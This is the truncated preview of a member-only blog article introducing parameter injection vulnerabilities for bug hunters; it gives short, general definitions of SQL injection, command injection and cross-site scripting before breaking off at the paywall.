Member-only story
Bug Hunting 101: Parameter Injection Vulnerabilities
TL;DR- A simple guide on the best way to find parameter injection vulnerabilities, as well as tips on how to exploit and mitigate them.
Introduction
Parameter injection vulnerabilities refer to security flaws that occur when an attacker is able to manipulate the parameters of a web application in order to obtain sensitive data or control the app in an unintended way.
These types of vulnerabilities are particularly dangerous because they allow an attacker to bypass authentication and access controls, potentially leaking sensitive information or allowing malicious actions on the app.
Types of Parameter Injection
SQLi (SQL Injection) →
One common form of parameter injection vulnerability is SQL injection. This occurs when an attacker is able to manipulate an SQL query by injecting malicious code into one or more of the query’s parameters.
An attacker might exploit an SQL injection vulnerability to add additional conditions to a query that allows them to view sensitive data that they would normally require elevated permissions for.
Command Injection →
Another form of parameter injection vulnerability is command injection. This occurs when an attacker is able to execute arbitrary commands on the underlying operating system by using special code in the parameters of a web app. For example, attackers could utilize a vulnerability that allows them to access the operating system’s command prompt, or to upload and execute malicious code on the server.
Cross-Site Scripting (XSS) →
A third form of parameter injection vulnerability is Cross-Site Scripting (XSS). This occurs when an attacker can inject code into a web application from the client side, and force it to execute on other users' browsers. An attacker might exploit an XSS vulnerability to capture sensitive information from other users. If they capture credentials from…
